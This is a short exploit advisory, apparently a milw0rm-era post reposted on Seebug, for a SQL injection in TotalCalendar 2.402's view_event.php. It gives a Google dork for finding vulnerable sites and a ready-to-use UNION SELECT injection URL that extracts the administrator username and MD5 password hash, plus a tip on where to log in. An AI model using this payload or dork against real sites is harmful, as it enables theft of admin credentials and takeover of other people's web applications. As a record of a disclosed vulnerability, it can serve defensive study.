--==+================================================================================+==--<br /> --==+ TotalCalendar 2.402 SQL Injection Vulnerability +==--<br /> --==+================================================================================+==--<br /> <br /> <br /> <br /> AUTHOR: t0pP8uZz & xprog<br /> SITE: http://sweetphp.com/nuke/index.php<br /> DORK: allintext:"Powered by: TotalCalendar"<br /> <br /> DESCRIPTION:<br /> Remote SQL injection in view_event.php id, able to pull admin username/md5hash. <br /> <br /> EXPLOIT:<br /> http://site.com/calender/path/view_event.php?id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,pw),5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/tcal_users/**/WHERE/**/uid=1/*<br /> <br /> Tip/Note:<br /> Login is in /auth.php?action=login<br /> Older versions of this script are using magic quotes, while the newest is not.<br /> The module version (ie: modules.php?name=totalcalendar) of this script has the vulnerabilities but php-nuke never lets them reach the module.<br /> <br /> <br /> GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !<br /> <br /> <br /> --==+================================================================================+==--<br /> --==+ TotalCalendar 2.402 SQL Injection Vulnerability +==--<br /> --==+================================================================================+==--
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论